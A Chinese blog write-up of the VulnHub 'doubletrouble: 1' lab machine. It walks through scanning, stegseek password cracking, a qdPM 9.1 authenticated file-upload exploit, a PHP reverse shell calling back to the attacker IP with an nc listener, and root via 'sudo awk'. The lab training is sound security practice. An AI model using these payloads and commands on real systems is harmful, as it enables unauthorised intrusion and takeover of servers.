vulnhub doubletrouble: 1

最新推荐文章于 2024-05-20 15:38:32 发布
最新推荐文章于 2024-05-20 15:38:32 发布
阅读量3.1k 收藏 3
点赞数
分类专栏: vulnhub 文章标签: stegseek 图片隐写 awk提权 php反弹shell qdPM
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124371444
版权

渗透思路:

nmap扫描----gobuster扫描网站目录----stegseek爆破图片隐写密码,获得网站用户密码----利用qdPM 9.1远程命令执行(任意文件上传)漏洞getshell----awk sudo提权

环境信息:

靶机:192.168.101.61

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.61

很快扫描出两个端口:22(ssh)和80(http)

2、gobuster扫描网站目录

​gobuster dir -u http://192.168.101.61/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫描到不少目录,备用

3、兔子洞:利用qdPM 9.1未授权访问漏洞获得数据库用户名和密码

访问http://192.168.101.61/被重定向到http://192.168.101.61/index.php/login

从该页面可以发现这是基于qdPM 9.1的站点

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers上有一堆qdPM 9.1的漏洞

因为现在还登录不进去,所以先看一下这个qdPM 9.2 - Password Exposure (Unauthenticated)的漏洞

数据库的密码存放在yml文件中,可以未授权访问http://<website>/core/config/databases.yml来获取

浏览器访问:http://192.168.101.61/core/config/databases.yml,并下载

下载后查看文件,发现username是otis,password是一句php代码"<?php echo urlencode('rush') ; ?>"

这句php代码的意思就是打印出url编码的rush字符串,其实rush里面没有需要被url编码的特殊字符,应该输出就是rush,不过为了保险起见,可以在攻击机上执行一下这个php代码:

php -r "echo urlencode('rush');"

执行结果如我所料,就是rush

4、兔子洞后续:重新安装网站

访问刚刚gobuster扫描出来的网站安装页面http://192.168.101.61/install/,点一下Database Config按钮,尝试重新安装网站。

来到http://192.168.101.61/install/index.php?step=database_config页面,将DB username的值填写为otis,DB password的值填写为rush,点击install Database

来到http://192.168.101.61/install/index.php?step=qdpm_config页面,填写Password,点击Save

上一步操作成功之后,来到登录页面http://192.168.101.61/index.php/login,尝试用用户名admin@localhost.com,以及刚刚设置的密码登录,结果还是登录不上去

5、 stegseek爆破图片隐写密码,得到网站用户名和密码

访问gobuster爆破出的目录http://192.168.101.61/secret/,发现有一张图片

把图片保存到本地,然后就来到了我的未知领域:图片隐写

网上看到有大师用的是stegseek工具,查了一下非常方便快捷。

首先在github上(GitHub - RickdeJager/stegseek: Worlds fastest steghide cracker, chewing through millions of passwords per second)下载.deb文件,然后执行

sudo apt install ./stegseek_0.6-1.deb

即可成功安装

安装完成后执行

stegseek doubletrouble.jpg ./rockyou.txt

其中rockyou.txt是从/usr/share/wordlists/rockyou.txt.gz解压出来的巨大字典。

不到2s就爆破出结果了,结果放在文件doubletrouble.jpg.out中

查看doubletrouble.jpg.out的内容,发现用户名otisrush@localhost.com,密码otis666

6、利用qdPM 9.1远程命令执行(任意文件上传)漏洞getshell

来到网站登录页面http://192.168.101.61/index.php/login,用上一步中爆破出的用户名密码成功登录

步骤3中在Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers上搜到了一堆qdPM 9.1的漏洞,其中包括远程命令执行漏洞(CVE-2020-7246),可以用来getshell

6.1 使用现成的exp

可以用qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) - PHP webapps Exploit这个exp来上传后门

整个下载和执行的过程命令如下:

wget https://www.exploit-db.com/download/50175
mv 50175 50175.py
chmod +x 50175.py
python3 ./50175.py -url http://192.168.101.61/ -u otisrush@localhost.com -p otis666

但是我发现这个exp中的异常换行特别多,还得自己把异常换行全改了才能执行

执行完之后,提示文件已经保存在http://192.168.101.61//uploads/users/下了

访问http://192.168.101.61/uploads/users/,这个710364-backdoor.php就是exp上传的后门

浏览器地址栏输入http://192.168.101.61/uploads/users/710364-backdoor.php?cmd=id,发现后门是有效的

6.2 自己上传反弹shell

从上面下载的exp中其实可以发现,后门的上传和http://192.168.101.61/index.php/myAccount页面有关。

访问这个页面,发现有一个可以上传文件的位置Photo

在攻击机上新建文件shell1.php,内容是php反弹shell

<?php $sock=fsockopen("192.168.101.34",1111);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>

http://192.168.101.61/index.php/myAccount页面上传这个文件,虽然上传后页面会像下面这样报错,但实际文件已经上传成功了

攻击机上nc监听1111端口

nc -nlvp 1111

http://192.168.101.61/uploads/users/下找到刚上传的文件

点击该文件进行访问,攻击机上获得反弹shell

输入以下命令,把shell改成交互式的

python -c 'import pty; pty.spawn("/bin/bash")'

7、awk sudo提权

这个靶机的提权非常简单,我都没想到www-data居然会有sudo权限

sudo -l

发现当前用户www-data可以sudo执行/usr/bin/awk

在GTFObins上搜索一下,发现awk可以sudo提权awk | GTFOBins

照着执行一下

sudo awk 'BEGIN {system("/bin/sh")}'

得到root权限

仙女象
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
doubletrouble靶机之隐写术、脏牛漏洞提权、GTFObins提权qdPM 9.1CMS漏洞利用
qq_40898302的博客
05-09 515
给exp添加一个执行权限,运行exp会让输入一个密码,然后生成一个firefart的用户,就可以使用这个用户和刚设置的密码以root权限登录服务器。真实环境中需要将/tmp/passwd.bak文件copy回原来的/etc/passwd进行替换。在提取出来的文件内发现了邮箱和一个字符串,尝试到登录后台。通过查看知道图片可以隐写4.7k的信息,并且存在密码。下载Deb格式的 StegSeek(需要用翻墙代理)查看网页源码发现使用qdPM 9.1CMS框架。代码缩进存在问题,进行修复。secret : 秘密。
文件上传攻击
qq_44915227的博客
04-20 1559
文件上传攻击实质上就是拿下网站的控制权,户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向上上传可执行的动态脚本文件。在我们的日常生活中经常会遇到,例如,我们在上传文件时,后台服务器对其文件检测不严时,通过修改后缀名进行执行木马病毒。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。WebSell:以ASP、PHP、JSP等网页文件形式存在的一种命令执行环境,也叫网页后门。
如何使用Stegseek解密并提取隐写工具Steghide隐藏的内容
最新发布
FreeBuf_的博客
05-20 971
该工具一开始作为Steghide项目的分支进行开发,因此该工具的运行速度非常快,要比其他破解工具快好几千倍,并且能够在不到两秒的时间里运行完整个rockyou.txt(rockyou.txt是一个包含了1400万个密码的著名字典)。Stegseek是一款针对Steghide的隐藏数据提取工具,该工具可以对经过Steghide工具处理过的内容进行分析,并从目标文件中提取出隐藏数据。-sf, --stegofile 选择一个stego文件。
Vulnhub靶场 渗透测试实战10:ICA: 1
随心所欲不逾矩
11-28 746
管理员的信息存储在qdpm下的 configuration表中,密码是app_administrator_password的值,可以去把源码下载下来看一下。在我看来,在访问系统时有一个弱点。据我所知,可执行文件的内容是部分可见的。我需要找出是否存在漏洞。qdPM 9.1 安装。
2021Kali系列 -- 目录扫描(Dirbuster)
热门推荐
weixin_41489908的博客
04-04 2万+
我心里一直是有个坎儿过不去,我总感觉我和她还没有结束,但我比谁都清楚,我跟这个人没有以后了。。。 ---- 网易云热评 简介:DirBuster支持全部的Web目录扫描方式。它既支持网页爬虫方式扫描,也支持基于字典暴力扫描,还支持纯暴力扫描。该工具使用Java语言编写,提供命令行(Headless)和图形界面(GUI)两种模式。其中,图形界面模式功能更为强大。用户不仅可以指定纯暴力扫描的字符规则,还可以设置以URL模糊方式构建网页路径。同时,用户还对网页解析方式进行各种定制,提高网址解析效率。 一、.
靶机渗透练习66-ICA
hirak0的博客
04-20 800
靶机描述 靶机地址:https://www.vulnhub.com/entry/ica-1,748/ Description According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
1. `src`目录:存放所有Java源代码,按照包结构组织。 2. `resources`目录:存储非代码资源,如配置文件、图片等。 3. `build.gradle`或`pom.xml`:构建文件,用于自动化构建和依赖管理,前者对应Gradle,后者对应...
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
vulnhub之momentum
weixin_54431413的博客
06-25 519
js脚本信息泄露,AES解密,在线平台codepen.io,端口服务和进程查看命令,redis未授权访问。scp命令。
qdPM_9.1(基于Web的项目管理工具).zip
03-25
qdPM-基于Web的项目管理工具 qdPM是一个基于Web的免费项目管理工具,适用于从事多个项目的小型团队。它是完全可配置的。您可以轻松管理项目,任务和人员。客户使用集成到任务中的票证系统进行交互。与php 5.4+和php 7.0+兼容 特征 可配置的项目类型,例如固定价格,支持,内部 可配置的任务状态,例如打开,关闭,批准 可配置的用户,包括组访问控制 项目,任务和用户的无限额外字段 不同的计费类型,例如每小时,固定价格,免费 多个项目/任务 使用项目和任务过滤器的多个任务视图 强大的报告模块,包括自定义报告生成器 以XLS格式导出任务 客户支持票证链接到任务,方便客户互动 日历 多种语言 完全可配置 皮肤和颜色主题
目录扫描Dirbuster的用法详解
小丁长不胖
11-17 8965
WEB 渗透测试工具dirbuster的使用方法 扫描Web目录,可以发现潜在的渗透目标。不同于网站爬虫,使用字典方式可以发现网站没有关联的网页。Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令,帮助用户从网页生成字典,或者生成定制字典。 DirBuster是一个多线程的基于Java的应用程序设计蛮力Web /应用服务
pydir:一个非常简单的脚本,灵感来自用Python编写的gobuster和dirbuster
04-13
:snake: 派迪尔 :snake: 灵感来自魔鬼和飞龙。 用python编写。 很简单的。 有点慢,将来我会添加线程。 用法 用法> python3 pydir.py -u [URL] -w [WORDLIST PATH] -e(不是必须的)[EXTENSION] 示例> python3 pydir.py -u https:// www .web .com / -w /home/user/Desktop/wordlists/dict.txt -e php ▼装备▼ -h || --help>显示脚本的用法-u || --url>我们将发出请求的网络URL -w || --wordlist>您的单词列表路径-e || --extension>将在URL末尾添加的扩展名。 不用了 谢谢阅读!
DirBuster
weixin_68177269的博客
01-16 888
kali自带的网站目录扫描工具
Dirbuster目录扫描工具使用学习
qq_34942239的博客
09-18 1678
Select scanning type:选择扫描类型,第一种是字典,第二种是单纯的暴力破解,一般使用字典,dirbuster自带字典在/usr/share/dirbust/wordlists里面。Select starting options:选择开始选项,第一种是标准模式爆破,第二种是url模糊爆破。work method:第一种是只使用GET请求,第二种是自动切换HEAD 和GET请求,一般使用第二种。dirbuster是kali自带的一款路径扫描工具,用来扫描网站的一些敏感文件。
使用DirBuster寻找敏感文件和目录
weixin_71416901的博客
05-28 320
多数操作系统(包括DOS及Windows)中dir命令基本上会列出目录中的文件及子目录的名称,也可以列出其文件大小,创建时间等相关信息,并且列出所在的磁盘、可用空间等信息。(使用字典扫描) 勾选它 选择Browse选择字典文件,用自己的文件,pure brute force(纯暴力破解)。是directory的缩写(是目录的意思) 在DOS操作系统中DIR 用来查看磁盘中文件的命令,dir有很多的参数。这一列中的内容是数字,代表相应代码,不同的代码表示不同的含义。在浏览窗口中,选择刚刚创建的文件。
路径遍历工具dirbuster
weixin_43487849的博客
05-21 2500
dirbuster是一个路径遍历(爆破)工具,可以对网站目录进行爆破,kali中打开即可,无需安装。 打开后进行配置: 输入要扫描的url 选择模式,通常为“Auto Switch(HEAD and GET)” 选择线程,一般10-20即可,太大容易造成dos 选择使用字典,字典可以使用工具默认的,路径如图所示,也可以自己构造(通常不采用Pure Brute Force,这种纯暴力破解命中率较低,采用模糊测试效果更好) 选择URL Fuzz 输入/{dir}, dir是一个变量,代表替换字典中的每一行
DirBuster目录扫描工具下载安装和简单使用
sinat_36735003的博客
08-16 7393
参考资料《Web安全攻防 渗透测试实战指南》 DirBuster是OWASP开发的,基于Java编写的,专门用于探测Web服务器的目录和隐藏文件的工具,需要在在JRE下安装。 一、准备JAVA运行环境(此教程为jdk1.8版本) 1.下载地址: https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html 2.下载时要求使用Oracle账号,有账号直接登录,没有账号需要创建账号 3.账号创建成功后开始
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值